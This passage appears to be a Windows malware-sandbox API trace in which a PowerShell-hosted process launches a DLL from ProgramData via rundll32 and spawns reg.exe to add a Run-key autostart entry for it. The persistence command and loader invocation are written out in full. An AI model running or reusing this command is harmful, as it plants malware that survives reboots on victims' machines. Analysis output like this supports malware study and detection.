(hEventLog=0x1bb30008, wType=0x4, wCategory=0x4, dwEventID=0x193, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x33529a8*="Stopped", lpRawData=0x3352738) returned 1 [0262.117] SetConsoleCtrlHandler (HandlerRoutine=0x0, Add=0) returned 1 [0262.119] CoGetContextToken (in: pToken=0x16f110 | out: pToken=0x16f110) returned 0x0 [0262.119] CObjectContext::QueryInterface () returned 0x0 [0262.120] CObjectContext::GetCurrentThreadType () returned 0x0 [0262.120] Release () returned 0x0 [0262.122] CoGetContextToken (in: pToken=0x16ece0 | out: pToken=0x16ece0) returned 0x0 [0262.122] CObjectContext::QueryInterface () returned 0x0 [0262.122] CObjectContext::GetCurrentThreadType () returned 0x0 [0262.122] Release () returned 0x0 [0262.123] CoGetContextToken (in: pToken=0x16ece0 | out: pToken=0x16ece0) returned 0x0 [0262.123] CObjectContext::QueryInterface () returned 0x0 [0262.123] CObjectContext::GetCurrentThreadType () returned 0x0 [0262.123] Release () returned 0x0 [0263.099] CoGetContextToken (in: pToken=0x16ece0 | out: pToken=0x16ece0) returned 0x0 [0263.099] CObjectContext::QueryInterface () returned 0x0 [0263.099] CObjectContext::GetCurrentThreadType () returned 0x0 [0263.099] Release () returned 0x0 [0263.434] CoGetContextToken (in: pToken=0x16ecd0 | out: pToken=0x16ecd0) returned 0x0 [0263.434] CObjectContext::QueryInterface () returned 0x0 [0263.434] CObjectContext::GetCurrentThreadType () returned 0x0 [0263.434] Release () returned 0x0 [0263.436] CoUninitialize () Thread: id = 46 os_tid = 0xa3c Thread: id = 47 os_tid = 0xa4c Thread: id = 48 os_tid = 0xa5c Thread: id = 49 os_tid = 0xa6c Thread: id = 50 os_tid = 0xa7c Thread: id = 51 os_tid = 0xa8c Thread: id = 52 os_tid = 0xa9c [0222.748] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0250.003] RegCloseKey (hKey=0x1c8) returned 0x0 [0250.003] LocalFree (hMem=0x2e33d0) returned 0x0 [0250.003] CloseHandle (hObject=0x324) returned 1 [0250.003] CloseHandle (hObject=0x13) returned 1 [0250.004] CloseHandle (hObject=0xf) returned 1 [0250.005] RegCloseKey (hKey=0x310) returned 0x0 [0250.005] RegCloseKey (hKey=0x30c) returned 0x0 [0250.005] RegCloseKey (hKey=0x308) returned 0x0 [0250.005] LocalFree (hMem=0x2e33a0) returned 0x0 [0253.154] RegCloseKey (hKey=0x30c) returned 0x0 [0255.530] RegCloseKey (hKey=0x388) returned 0x0 [0255.531] RegCloseKey (hKey=0x384) returned 0x0 [0255.531] RegCloseKey (hKey=0x380) returned 0x0 [0255.531] RegCloseKey (hKey=0x37c) returned 0x0 [0255.532] RegCloseKey (hKey=0x378) returned 0x0 [0255.532] RegCloseKey (hKey=0x374) returned 0x0 [0255.532] RegCloseKey (hKey=0x350) returned 0x0 [0255.533] RegCloseKey (hKey=0x3a0) returned 0x0 [0255.533] RegCloseKey (hKey=0x36c) returned 0x0 [0255.533] RegCloseKey (hKey=0x368) returned 0x0 [0255.534] RegCloseKey (hKey=0x364) returned 0x0 [0255.534] RegCloseKey (hKey=0x360) returned 0x0 [0255.534] RegCloseKey (hKey=0x35c) returned 0x0 [0255.534] RegCloseKey (hKey=0x358) returned 0x0 [0255.535] RegCloseKey (hKey=0x354) returned 0x0 [0255.535] RegCloseKey (hKey=0x39c) returned 0x0 [0255.535] RegCloseKey (hKey=0x398) returned 0x0 [0255.535] RegCloseKey (hKey=0x344) returned 0x0 [0255.536] RegCloseKey (hKey=0x340) returned 0x0 [0255.536] RegCloseKey (hKey=0x33c) returned 0x0 [0255.536] RegCloseKey (hKey=0x338) returned 0x0 [0255.537] RegCloseKey (hKey=0x334) returned 0x0 [0255.537] RegCloseKey (hKey=0x330) returned 0x0 [0255.537] RegCloseKey (hKey=0x1c8) returned 0x0 [0255.537] RegCloseKey (hKey=0x310) returned 0x0 [0255.538] RegCloseKey (hKey=0x30c) returned 0x0 [0255.538] RegCloseKey (hKey=0x394) returned 0x0 [0255.538] RegCloseKey (hKey=0x390) returned 0x0 [0255.539] RegCloseKey (hKey=0x370) returned 0x0 [0255.539] RegCloseKey (hKey=0x3a4) returned 0x0 [0263.089] LocalFree (hMem=0x343ba0) returned 0x0 [0263.090] LocalFree (hMem=0x343a90) returned 0x0 [0263.098] DeregisterEventSource (hEventLog=0x1bb30008) returned 1 [0263.419] CloseHandle (hObject=0x37c) returned 1 [0263.419] CloseHandle (hObject=0x388) returned 1 [0263.419] CloseHandle (hObject=0x38c) returned 1 [0263.420] CloseHandle (hObject=0x3e0) returned 1 [0263.421] CloseHandle (hObject=0x3e4) returned 1 [0263.421] CloseHandle (hObject=0x378) returned 1 [0263.421] CloseHandle (hObject=0x410) returned 1 [0263.422] RegCloseKey (hKey=0x420) returned 0x0 [0263.422] CloseHandle (hObject=0x41c) returned 1 [0263.423] CloseHandle (hObject=0x418) returned 1 [0263.423] CloseHandle (hObject=0x414) returned 1 [0263.423] CloseHandle (hObject=0x3c8) returned 1 [0263.424] CloseHandle (hObject=0x404) returned 1 [0263.424] CloseHandle (hObject=0x3b4) returned 1 [0263.425] CloseHandle (hObject=0x3ac) returned 1 [0263.425] RegCloseKey (hKey=0x39c) returned 0x0 [0263.425] CloseHandle (hObject=0x398) returned 1 [0263.426] CloseHandle (hObject=0x344) returned 1 [0263.426] CloseHandle (hObject=0x340) returned 1 [0263.426] CloseHandle (hObject=0x33c) returned 1 [0263.427] CloseHandle (hObject=0x338) returned 1 [0263.427] CloseHandle (hObject=0x334) returned 1 [0263.427] CloseHandle (hObject=0x330) returned 1 [0263.428] CloseHandle (hObject=0x1c8) returned 1 [0263.428] CloseHandle (hObject=0x310) returned 1 [0263.428] CloseHandle (hObject=0x30c) returned 1 [0263.429] CloseHandle (hObject=0x394) returned 1 [0263.429] CloseHandle (hObject=0x1cc) returned 1 [0263.429] CloseHandle (hObject=0x390) returned 1 [0263.430] CloseHandle (hObject=0x370) returned 1 [0263.430] RegCloseKey (hKey=0xffffffff80000004) returned 0x0 [0263.430] CloseHandle (hObject=0x2f0) returned 1 [0263.431] CloseHandle (hObject=0x320) returned 1 [0263.431] UnmapViewOfFile (lpBaseAddress=0x1f30000) returned 1 Thread: id = 54 os_tid = 0xa1c [0260.194] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0260.203] SetThreadUILanguage (LangId=0x0) returned 0x7fffffa0409 [0260.212] CoTaskMemAlloc (cb=0x104) returned 0x343cb0 [0260.212] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343cb0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0260.212] CoTaskMemFree (pv=0x343cb0) [0260.215] VirtualQuery (in: lpAddress=0x1c9ddd20, lpBuffer=0x1c9debe0, dwLength=0x30 | out: lpBuffer=0x1c9debe0*(BaseAddress=0x1c9dd000, AllocationBase=0x1c050000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0260.223] CoTaskMemAlloc (cb=0x104) returned 0x343cb0 [0260.223] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343cb0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0260.223] CoTaskMemFree (pv=0x343cb0) [0260.226] CoTaskMemAlloc (cb=0x104) returned 0x343cb0 [0260.226] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343cb0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0260.226] CoTaskMemFree (pv=0x343cb0) [0260.230] CoTaskMemAlloc (cb=0x104) returned 0x343cb0 [0260.230] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343cb0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0260.230] CoTaskMemFree (pv=0x343cb0) [0260.247] CoTaskMemAlloc (cb=0x104) returned 0x343cb0 [0260.247] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343cb0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0260.247] CoTaskMemFree (pv=0x343cb0) [0260.251] CoTaskMemAlloc (cb=0x104) returned 0x343cb0 [0260.251] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343cb0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0260.251] CoTaskMemFree (pv=0x343cb0) [0260.253] CoTaskMemAlloc (cb=0x104) returned 0x343cb0 [0260.253] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343cb0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0260.253] CoTaskMemFree (pv=0x343cb0) [0260.262] VirtualQuery (in: lpAddress=0x1c9ddfd0, lpBuffer=0x1c9dee90, dwLength=0x30 | out: lpBuffer=0x1c9dee90*(BaseAddress=0x1c9dd000, AllocationBase=0x1c050000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0260.263] CoTaskMemAlloc (cb=0x104) returned 0x343cb0 [0260.263] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343cb0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0260.263] CoTaskMemFree (pv=0x343cb0) [0260.267] CoTaskMemAlloc (cb=0x104) returned 0x343cb0 [0260.267] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343cb0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0260.267] CoTaskMemFree (pv=0x343cb0) [0260.268] CoTaskMemAlloc (cb=0x104) returned 0x343cb0 [0260.268] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343cb0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0260.268] CoTaskMemFree (pv=0x343cb0) [0260.270] CoTaskMemAlloc (cb=0x104) returned 0x343cb0 [0260.270] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343cb0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0260.270] CoTaskMemFree (pv=0x343cb0) [0260.278] CoTaskMemAlloc (cb=0x104) returned 0x343cb0 [0260.278] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343cb0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0260.278] CoTaskMemFree (pv=0x343cb0) [0260.384] CoTaskMemAlloc (cb=0x104) returned 0x343cb0 [0260.384] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343cb0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0260.385] CoTaskMemFree (pv=0x343cb0) [0260.388] CoTaskMemAlloc (cb=0x104) returned 0x343cb0 [0260.388] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343cb0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0260.388] CoTaskMemFree (pv=0x343cb0) [0260.389] CoTaskMemAlloc (cb=0x104) returned 0x343cb0 [0260.389] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343cb0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0260.390] CoTaskMemFree (pv=0x343cb0) [0260.394] CoTaskMemAlloc (cb=0x104) returned 0x343cb0 [0260.394] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343cb0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0260.394] CoTaskMemFree (pv=0x343cb0) [0260.396] CoTaskMemAlloc (cb=0x104) returned 0x343cb0 [0260.396] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343cb0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0260.396] CoTaskMemFree (pv=0x343cb0) [0260.398] CoTaskMemAlloc (cb=0x104) returned 0x343cb0 [0260.398] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343cb0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0260.398] CoTaskMemFree (pv=0x343cb0) [0260.400] CoTaskMemAlloc (cb=0x104) returned 0x343cb0 [0260.400] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343cb0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0260.400] CoTaskMemFree (pv=0x343cb0) [0260.432] CoTaskMemAlloc (cb=0x104) returned 0x343cb0 [0260.432] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343cb0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0260.432] CoTaskMemFree (pv=0x343cb0) [0260.455] CoTaskMemAlloc (cb=0x104) returned 0x343cb0 [0260.455] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343cb0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0260.455] CoTaskMemFree (pv=0x343cb0) [0260.460] CoTaskMemAlloc (cb=0x104) returned 0x343cb0 [0260.460] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343cb0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0260.460] CoTaskMemFree (pv=0x343cb0) [0260.493] CoTaskMemAlloc (cb=0x104) returned 0x343cb0 [0260.493] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343cb0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0260.493] CoTaskMemFree (pv=0x343cb0) [0260.991] CoTaskMemAlloc (cb=0x104) returned 0x343cb0 [0260.991] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x343cb0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0260.991] CoTaskMemFree (pv=0x343cb0) [0261.008] CoTaskMemAlloc (cb=0x104) returned 0x343cb0 [0261.008] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x343cb0, nSize=0x80 | out: lpBuffer="") returned 0x92 [0261.009] CoTaskMemFree (pv=0x343cb0) [0261.009] CoTaskMemAlloc (cb=0x128) returned 0x1ba69bc0 [0261.009] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x1ba69bc0, nSize=0x92 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Program Files\\Microsoft Office\\root\\Client") returned 0x91 [0261.009] CoTaskMemFree (pv=0x1ba69bc0) [0261.038] CoTaskMemAlloc (cb=0x20e) returned 0x385370 [0261.038] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x385370 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop") returned 0x19 [0261.038] CoTaskMemFree (pv=0x385370) [0261.043] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9ddd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0261.044] SetErrorMode (uMode=0x1) returned 0x1 [0261.048] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\rundll32.exe", lpFindFileData=0x1c9ddeb0 | out: lpFindFileData=0x1c9ddeb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b22889, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0xa8b22889, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0xef0b1d90, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0xb200, dwReserved0=0x0, dwReserved1=0x0, cFileName="rundll32.exe", cAlternateFileName="")) returned 0x39b690 [0261.050] FindNextFileW (in: hFindFile=0x39b690, lpFindFileData=0x1c9ddec0 | out: lpFindFileData=0x1c9ddec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b22889, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0xa8b22889, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0xef0b1d90, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0xb200, dwReserved0=0x0, dwReserved1=0x0, cFileName="rundll32.exe", cAlternateFileName="")) returned 0 [0261.050] FindClose (in: hFindFile=0x39b690 | out: hFindFile=0x39b690) returned 1 [0261.050] SetErrorMode (uMode=0x1) returned 0x1 [0261.052] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\rundll32.exe", nBufferLength=0x105, lpBuffer=0x1c9ddfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\rundll32.exe", lpFilePart=0x0) returned 0x20 [0261.052] SetErrorMode (uMode=0x1) returned 0x1 [0261.052] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\rundll32.exe" (normalized: "c:\\windows\\system32\\rundll32.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c9de1e0 | out: lpFileInformation=0x1c9de1e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b22889, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0xa8b22889, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0xef0b1d90, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0xb200)) returned 1 [0261.052] SetErrorMode (uMode=0x1) returned 0x1 [0261.053] CoTaskMemAlloc (cb=0x104) returned 0x343cb0 [0261.054] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343cb0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0261.054] CoTaskMemFree (pv=0x343cb0) [0261.056] CoTaskMemAlloc (cb=0x104) returned 0x343cb0 [0261.056] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343cb0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0261.056] CoTaskMemFree (pv=0x343cb0) [0261.114] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x105, lpBuffer=0x1c9ddaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19 [0261.114] SetErrorMode (uMode=0x1) returned 0x1 [0261.114] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop" (normalized: "c:\\users\\aetadzjz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x1c9ddd50 | out: lpFileInformation=0x1c9ddd50*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0xabdb7dc0, ftLastAccessTime.dwHighDateTime=0x1d60de6, ftLastWriteTime.dwLowDateTime=0xabdb7dc0, ftLastWriteTime.dwHighDateTime=0x1d60de6, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0261.114] SetErrorMode (uMode=0x1) returned 0x1 [0261.114] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x105, lpBuffer=0x1c9ddaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19 [0261.114] SetErrorMode (uMode=0x1) returned 0x1 [0261.114] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop" (normalized: "c:\\users\\aetadzjz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x1c9ddd50 | out: lpFileInformation=0x1c9ddd50*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0xabdb7dc0, ftLastAccessTime.dwHighDateTime=0x1d60de6, ftLastWriteTime.dwLowDateTime=0xabdb7dc0, ftLastWriteTime.dwHighDateTime=0x1d60de6, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0261.115] SetErrorMode (uMode=0x1) returned 0x1 [0261.122] LocalAlloc (uFlags=0x0, uBytes=0x42) returned 0x1ba511f0 [0261.123] RtlMoveMemory (in: Destination=0x1ba511f0, Source=0x333c700, Length=0x42 | out: Destination=0x1ba511f0) [0261.123] LocalAlloc (uFlags=0x0, uBytes=0x4e) returned 0x39b690 [0261.123] RtlMoveMemory (in: Destination=0x39b690, Source=0x333d510, Length=0x4e | out: Destination=0x39b690) [0261.123] LocalAlloc (uFlags=0x0, uBytes=0x34) returned 0x1ba66360 [0261.123] RtlMoveMemory (in: Destination=0x1ba66360, Source=0x3346738, Length=0x34 | out: Destination=0x1ba66360) [0261.980] LocalFree (hMem=0x1ba511f0) returned 0x0 [0261.980] LocalFree (hMem=0x39b690) returned 0x0 [0261.981] LocalFree (hMem=0x1ba66360) returned 0x0 [0261.983] NtQueryInformationProcess (in: ProcessHandle=0x410, ProcessInformationClass=0x0, ProcessInformation=0x3346fc8, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x3346fc8, ReturnLength=0x0) returned 0x0 [0261.987] EnumProcesses (in: lpidProcess=0x3347010, cb=0x400, lpcbNeeded=0x1c9de5b0 | out: lpidProcess=0x3347010, lpcbNeeded=0x1c9de5b0) returned 1 [0262.035] SetEvent (hEvent=0x334) returned 1 [0262.035] SetEvent (hEvent=0x310) returned 1 [0262.035] SetEvent (hEvent=0x1c8) returned 1 [0262.035] SetEvent (hEvent=0x330) returned 1 [0262.035] SetEvent (hEvent=0x344) returned 1 [0262.035] SetEvent (hEvent=0x338) returned 1 [0262.035] SetEvent (hEvent=0x33c) returned 1 [0262.035] SetEvent (hEvent=0x340) returned 1 [0262.035] SetEvent (hEvent=0x398) returned 1 [0262.037] CoUninitialize () Thread: id = 55 os_tid = 0x938 [0261.127] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0261.139] ShellExecuteExW (in: pExecInfo=0x3346d20*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="C:\\Windows\\system32\\rundll32.exe", lpParameters="C:\\ProgramData\\DataExchange.dll Start ", lpDirectory="C:\\Users\\aETAdzjz\\Desktop", nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x3346d20*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="C:\\Windows\\system32\\rundll32.exe", lpParameters="C:\\ProgramData\\DataExchange.dll Start ", lpDirectory="C:\\Users\\aETAdzjz\\Desktop", nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x410)) returned 1 [0261.480] CoGetContextToken (in: pToken=0x1ca6f750 | out: pToken=0x1ca6f750) returned 0x0 [0261.733] CoUninitialize () Thread: id = 57 os_tid = 0x530 [0262.058] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0262.060] SetThreadUILanguage (LangId=0x0) returned 0x7fffffa0409 [0262.061] VirtualQuery (in: lpAddress=0x1c8bd960, lpBuffer=0x1c8be820, dwLength=0x30 | out: lpBuffer=0x1c8be820*(BaseAddress=0x1c8bd000, AllocationBase=0x1bf30000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0262.062] VirtualQuery (in: lpAddress=0x1c8bdc10, lpBuffer=0x1c8bead0, dwLength=0x30 | out: lpBuffer=0x1c8bead0*(BaseAddress=0x1c8bd000, AllocationBase=0x1bf30000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0262.067] SetEvent (hEvent=0x388) returned 1 [0262.067] SetEvent (hEvent=0x37c) returned 1 [0262.067] SetEvent (hEvent=0x3b4) returned 1 [0262.067] SetEvent (hEvent=0x388) returned 1 [0262.067] SetEvent (hEvent=0x37c) returned 1 [0262.068] SetEvent (hEvent=0x418) returned 1 [0262.068] SetEvent (hEvent=0x404) returned 1 [0262.068] SetEvent (hEvent=0x3c8) returned 1 [0262.068] SetEvent (hEvent=0x414) returned 1 [0262.068] SetEvent (hEvent=0x41c) returned 1 [0262.069] CoUninitialize () Process: id = "4" image_name = "reg.exe" filename = "c:\\windows\\system32\\reg.exe" page_root = "0x2bbff000" os_pid = "0xa1c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x938" cmd_line = "REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v AutoStart /t REG_SZ /d \"rundll32.exe C:\\ProgramData\\DataExchange.dll,Start\"" cur_dir = "C:\\Users\\aETAdzjz\\Desktop\\" os_username = "YKYD69Q\\aETAdzjz" bitness = "32" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f18d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 45 os_tid = 0xa2c [0214.912] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26f9f0 | out: lpSystemTimeAsFileTime=0x26f9f0*(dwLowDateTime=0xf1475780, dwHighDateTime=0x1d60de6)) [0214.913] GetCurrentProcessId () returned 0xa1c [0214.913] GetCurrentThreadId () returned 0xa2c [0214.913] GetTickCount () returned 0x116733d [0214.913] QueryPerformanceCounter (in: lpPerformanceCount=0x26f9f8 | out: lpPerformanceCount=0x26f9f8*=28055483736) returned 1 [0214.913] GetModuleHandleW (lpModuleName=0x0) returned 0xff270000 [0214.913] __set_app_type (_Type=0x1) [0214.913] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff2800d0) returned 0x0 [0214.913] __wgetmainargs (in: _Argc=0xff282140, _Argv=0xff282150, _Env=0xff282148, _DoWildCard=0, _StartInfo=0xff28215c | out: _Argc=0xff282140, _Argv=0xff282150, _Env=0xff282148) returned 0 [0214.914] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="ADD", cchCount1=-1, lpString2="QUERY", cchCount2=-1) returned 1 [0215.015] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="ADD", cchCount1=-1, lpString2="ADD", cchCount2=-1) returned 2 [0215.015] RegOpenKeyW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", phkResult=0x26f9c8 | out: phkResult=0x26f9c8*=0x0) returned 0x2 [0215.015] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="ADD", cchCount1=-1, lpString2="ADD", cchCount2=-1) returned 2 [0215.015] lstrlenW (lpString="-?|/?|-h|/h") returned 11 [0215.015] GetProcessHeap () returned 0x360000 [0215.015] RtlAllocateHeap (HeapHandle=0x360000, Flags=0xc, Size=0x18) returned 0x37b770 [0215.015] lstrlenW (lpString="") returned 0 [0215.015] GetProcessHeap () returned 0x360000 [0215.015] RtlAllocateHeap (HeapHandle=0x360000, Flags=0xc, Size=0x2) returned 0x37b790 [0215.015] GetProcessHeap () returned 0x360000 [0215.015] RtlAllocateHeap (HeapHandle=0x360000, Flags=0xc, Size=0x20) returned 0x375af0 [0215.016] GetProcessHeap () returned 0x360000 [0215.016] RtlAllocateHeap (HeapHandle=0x360000, Flags=0xc, Size=0x18) returned 0x37b7b0 [0215.016] GetProcessHeap () returned 0x360000 [0215.016] RtlAllocateHeap (HeapHandle=0x360000, Flags=0xc, Size=0x20) returned 0x375b20 [0215.016] GetProcessHeap () returned 0x360000 [0215.016] RtlAllocateHeap (HeapHandle=0x360000, Flags=0xc, Size=0x20) returned 0x375b50 [0215.016] GetProcessHeap () returned 0x360000 [0215.016] RtlAllocateHeap (HeapHandle=0x360000, Flags=0xc, Size=0x20) returned 0x375b80 [0215.016] GetProcessHeap () returned 0x360000 [0215.016] RtlAllocateHeap (HeapHandle=0x360000, Flags=0xc, Size=0x20) returned 0x375bb0 [0215.016] GetProcessHeap () returned 0x360000 [0215.016] RtlAllocateHeap (HeapHandle=0x360000, Flags=0xc, Size=0x18) returned 0x37b7d0 [0215.016] GetProcessHeap () returned 0x360000 [0215.016] RtlAllocateHeap (HeapHandle=0x360000, Flags=0xc, Size=0x20) returned 0x375be0 [0215.016] GetProcessHeap () returned 0x360000 [0215.016] RtlAllocateHeap (HeapHandle=0x360000, Flags=0xc, Size=0x20) returned 0x375c10 [0215.016] GetProcessHeap () returned 0x360000 [0215.016] RtlAllocateHeap (HeapHandle=0x360000, Flags=0xc, Size=0x20) returned 0x375c40 [0215.016] GetProcessHeap () returned 0x360000 [0215.016] RtlAllocateHeap (HeapHandle=0x360000, Flags=0xc, Size=0x20) returned 0x375c70 [0215.016] GetProcessHeap () returned 0x360000 [0215.016] RtlAllocateHeap (HeapHandle=0x360000, Flags=0xc, Size=0x18) returned 0x37b7f0 [0215.016] GetProcessHeap () returned 0x360000 [0215.016] RtlAllocateHeap (HeapHandle=0x360000, Flags=0xc, Size=0x20) returned 0x375ca0 [0215.016] GetProcessHeap () returned 0x360000 [0215.016] RtlAllocateHeap (HeapHandle=0x360000, Flags=0xc, Size=0x20) returned 